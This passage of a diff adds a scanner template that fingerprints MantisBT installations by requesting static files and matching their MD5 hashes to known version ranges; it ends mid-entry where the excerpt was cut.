+ path: + - "{{BaseURL}}/js/jscalendar/lang/calendar-en.js" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"6b2f02f1cb05b5a53aafdd28a32346e9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jscalendar/calendar.js" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"c07f306a89a307100e0f24e053883097\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jscalendar/calendar-blue.css" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"4c50139975d4ceb05733c94facd25563\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jscalendar/calendar-setup.js" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"a58a825257d7c8ba920dc88dc42caf24\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jquery-1.12.4.min.js" + + matchers: + - type: dsl + name: 
1.3.0 - 1.3.20 + dsl: + - "(\"4f252523d4af0b478c810c2547a63e19\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/tables.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"5d0f9078d5f22f2f77f70b275529e907\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/jquery-ui-1.11.4.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"840cca94d5e33faf324bcd4988fa8401\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"26812a28850395f8f865be4893fb20c7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"b3f9d132c575a58198e878c2897dbca6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace-extra.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"63e17edddf7f976af471b5012358a7ee\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace-elements.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"34bc28eacea277ad3709547329279c04\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"f9b915337650a13583b5d29d30464f99\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jquery-ui-1.11.4.min.js" + + matchers: + - type: dsl + name: 1.3.0 - 2.1.3 + dsl: + - "(\"d935d506ae9c8dd9e0f96706fbb91f65\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace-extra.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"828a94f288ef752e46b9631fc623e15e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace-elements.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"90ebc56086ca9da6c64fb7f82c8da2d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/calendar-blue.css" + + matchers: + - type: dsl + name: 1.2.0 - 2.2.4 + dsl: + - "(\"7c561519a1cf3a882e27d1b9814888d4\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/soap.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.2.4 + dsl: + - "(\"c8dbf5487394d194770781e3410f400d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-datetimepicker-4.17.43.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"159e6f21fa8d971062f2a0483ddbb2b8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-datetimepicker-4.17.43.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"852fcbef76bc3e57db1b390560f9130e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/mantis_offline.php.sample" + + matchers: + - type: dsl + name: 1.2.0 - 2.24.3 + dsl: + - "(\"4118daa164bcad37c317a6efc038cf1c\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"5918d97dd2c8e98ac3a595f124a44a4c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/README" + + matchers: + - type: dsl + name: 1.3.0 - 2.18.1 + dsl: + - "(\"05daf17f99ba016bf0bbd7d84267c122\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"0082ade8c4c52cc5397baf423805e942\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/travis_script.sh" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"7551b29afe1b149c484d65cd44436c6a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/README" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"92a7a9c70c8956c3fbf930d4d8e59ac7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/readme.md" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 
+ dsl: + - "(\"808f403a9a96b9eb35aedc1ade02f6c4\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"0e211003845b252d1f2a70d1b0384825\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.svg" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"89889688147bd7575d6327160d64e760\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.woff" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"fa2772327f55d8198301fdb8bcfc8158\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.eot" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"25a32416abee198dd821b0b17a198a8f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.svg" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"d7c639084f684d66a1bc66855d193ed8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.eot" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"f4769f9bdb7466be65088239c12046d1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.woff2" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"448c34a56d699c29117adc64c43affeb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"7c5d9f078bea8c1fc0b21a764b832138\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.woff" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"c8ddf1e5e5bf3682bc7bebf30f394148\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.ttf" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"1dc35d25e61d819a9c357074014867ab\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/fonts/glyphicons-halflings-regular.ttf" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"e18bbf611f2a2e43afc071aa2f4e1512\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.woff2" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"e6cf7c6ec7c2d6f670ae9d762604cb0b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"3eb14f3838ada50e10f062a895c3b9cf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_english.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d62051e62da0ab89f7413443af730ff1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 1.3.2 - 2.24.3 + dsl: + - "(\"30008f612550c2db9958e676df2be8d6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_tagalog.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d2045dd77cd2fd570c3e994cabe74eb9\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"ad16a986c7a469f6476bc14800500e5c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"02fc3fcda16bc2e86770c2eb3dbaeb9e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"1c4ba0fc240258d025b1b1ffa7389db6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9f931332f70eb2f3650a316dbb010614\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"fa0e8f0390cd557d545d080850987094\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_arabicegyptianspoken.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"3c8150a1f95bfcee0845f39f24a46ac6\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/plugins/XmlImportExport/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"007cfee14b98337df059257345c7a65f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_pms.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"a33954ff3048ef824b3fc34b4a194d69\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_zh-cn.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.24.3 + dsl: + - "(\"8ca3abd71f703988db8ffadcd8754c0e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_id.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"ac923215f26875ba9fb7b11636fa5799\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_lithuanian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"5d17eed14bc68236422ddf6ece008297\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"53570598b9ac90ffb1ab80153396a821\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"1c7ae0660e2f3fa68ce904896e5ab920\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ea80399d9d556c771d365790fcc534b4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1c72b519de1423ebc139dedf22bafe28\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"4defb6984419ce2b4360a0e146a7db08\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_catalan.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4f5d1196b59af7a18111d19ba3c47e13\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"c625b3af91a110dd4e0fd2341051ad02\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"1c63cb1335fd4d77b5ee213617bbcf3a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - 
"(\"335be658540f525056006176728d1e92\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ccc34c9a34862730fcf63f5e5473142f\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2adde47e75a31685fc926067c8251ce7\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"e646fd77c3f55f759ff5163b3509bf22\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"4aaa48cde03645b19aac4ba64b14f4b4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 1.3.2 - 2.24.3 + dsl: + - "(\"f3e3bf65368847e9070d8824c37f2ad7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"64869f07bca9ab315359a2030b1ff574\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"b425dbca5b9e6ebbf893eb16bf03196a\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8e6e8a0b14016484a612e710261812ae\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"031b1c792bab95ab6b9e2a1c9cdbabe4\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"daf022504fea54506a55b792b8605f89\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"4eea16194dae629fea551de05532bb25\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"0ed2e7b8ab20f436ea17cb91d4bbdae6\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"3f158fba60d4cd1394713a88c74fe21e\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"8a18dbd395ea04cc607f937b5e47a70d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_diq.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"6068377b3b4fd7bd5af883f0ac5cc2d9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_afrikaans.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"f8cd0698ae1f9172c94670613ae50b44\" == 
md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"93f5f1131b7903b0f47888307bb08919\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"b2fb0fffa96af46682e2b826bb62e9df\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"d269924c3522249c7bd48f4e4bebef07\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"683b502ec6955e8be00768bd71122d16\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"12b0268e35ebf2211c5d06ab532620f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/mantis.dtd" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"26602ec447a7263cc99bcb05f715f487\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"eb716a68e78c590a2b1150815db92e41\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ms.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"445c74bf0c8b1f999f981eaa62f52fda\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 1.3.2 - 2.24.3 + dsl: + - "(\"f7230c71fdb9b5b824cd19a385c3cfa8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"a24f6b8334165c6e3482805513ebad0c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"e95d12f64844cc4b3bb88784539ad3af\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"644e6dccb9e4c8a02c521959fbbc92fc\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"fc6a4f05398282e58e3258fdb908e561\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"88153b9431dfe3855073267e151b73a5\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - 
"(\"8c2ed1c54dcecb0b08156644c36edca5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_tagalog.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"69c2b8036651e4c4242209beb4586091\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"b07a100c9c0a00e44aa8580722039cf3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"aa6354c45d5796055dcc6ce0f7980d83\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"21f45a62b925f8b4df7dfaa334fbfc10\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"19a6f96619c3e7e3751135d4a030dd1f\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"4a3eaa2551d175e33150dea750b86fa0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"fc338b573a25f2163eb10727f21cc2c9\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"68d89f77f7a2b3f8312eea568d90fe07\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"239b762d91693f816bad6ed901ccc20d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8f8e5d4229a63748bef980893b16975f\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"64c0ca1b4f1973c2ead40bc5212d9304\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"864b366cc79b9940250501e66cb0c150\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"5380518115f093ea1e7fab79cfbbeafe\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"e1917a91b3eb3851d9afc52b14303a5f\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"0b79f6258f6636eefaef25fd98a671de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - 
"(\"43bcd4bf29c62f2dca0cc9f498ef8172\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"b4c432955dc53cdd35cc92b05764a8e3\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"dee25201ead8fe9c5d28d69eb9d4a824\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"01b9f26150a3cd9ee7c19404ebec824e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"67cb1a66ddbb3ac863935b7c4f45192c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b38376c3d20eb656f9ca558dcdd35977\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"782b865edf778959812b99e19f905d43\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"71999f7ccc3ecaab1a695962cebf4f03\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_german.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"3db8ee56d0c6e6b7a1a0a00565ef3245\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"b478f59ecc5b3ce963066287b7d350b0\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"44868ac13f06a1621464c9bd7bde1036\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8953cb10a829990c4de6dc9d36d1df48\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"caf7bf28e3e8c65c1818afa7599d9cc4\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6aab61391d9e6ec355956b60e56244a8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"68bc2f0f4a1d221ca46d3cfce4fbbfe9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b383b9d17ac4326d80c6aa51909a34fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4265c738357e94059b6676a0c42d6650\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"6341598a5b546a5e9d41a2a21380febc\" == 
md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"2126de2ee68d0aa3f3fd57d0a0816d08\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1a7f4f21dc42998d909c5293bf7c2e93\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a63253ee214268c7e5a1a80a264f060a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"9ff53b2a76bfcfc6e59d6dd5df30cd11\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"72e5acf9e09045f5b7b0a700aa1c360a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_pms.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"52f6126718bf93470f44a6518d1f3161\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_swissgerman.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"020c5cffeaffc5084c25e1a6a491c4fe\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"5a2bbe74033a14f5485fdfb8c5936e21\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9f8ef2b7187d943ce45db2a23275e193\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"8f941aa5238e91600e22f35bad871482\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5b95eb1ed08729dc383d2beb35046a87\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"d75b684c0ba2dfa3b6227157dad2a853\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"36b1717d2936c3c90ebdf9eeab5a3e87\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_slovak.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c40c3c35ee8e5475179cedb658299b13\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"09dbd7be38cb46e0b6f17bb82b386c43\" == md5(body))" + - type: 
dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"d67b7d1ca20a0d33f32b6bd0e2a606be\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"a228ab9856044f0d5f5e30c7d809f3ba\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"140e5bff40e4a83c35bab196dcc44b12\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"3e99ca347d3f8fab044dae5e0bc0e02e\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"72ba3119e03223954d8644bf16fcf8a8\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"f65e8d036fd03c4a8204b6a68a15f4bd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_zh-cn.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.24.3 + dsl: + - "(\"e6d973f1f82177fe3c16080cf33c9ece\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_id.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"087d1d512f8cb3545c69dec204f7e1b3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lithuanian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"624c0c6270fb8ec55f4582efae4e02fe\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"5a014567e6ce574a163951ebd244c3ff\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"d362ec44c419df16ff28b63d7dc1f319\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"eaa7242924990b47a9b628bff0d6e959\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"12107578445762ba5b953af2ad8bad8b\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"12ad25d71829f673f8bc6bc6fbdcdab5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_dsb.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"97f3ce751f4dfb82997bd3d245acda27\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_romanian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"6f23549d103ee13d2d709d5cb8165554\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"b1e5cdc5e74fc4cfc3a129b1ad0951b9\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"f8d22ce1111ea108d0bd959d9a707acd\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1d7f83dcc5414ee097ae6fb197db536d\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"7853eb4f4082462f4f85f2f4702c04bf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_polish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"d24a26abfed70666552e3e71011e5354\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"04a5d3dd181a8765e04f7bc9b64f3887\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"4c4fb6158b1501722a0d588b32ddb192\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5668387bbcee41e3e656d4b1f56d3f0e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"c498f4f80d047ed7449e68e440b991c3\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"5de9d4b8c3b5549fa7da5f08cd6fe132\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bs.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"f55e61df281638764528015435d4bc38\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"2822d2d05681912987fc1f8c427826ce\" == md5(body))" + - type: dsl + name: 1.3.0 - 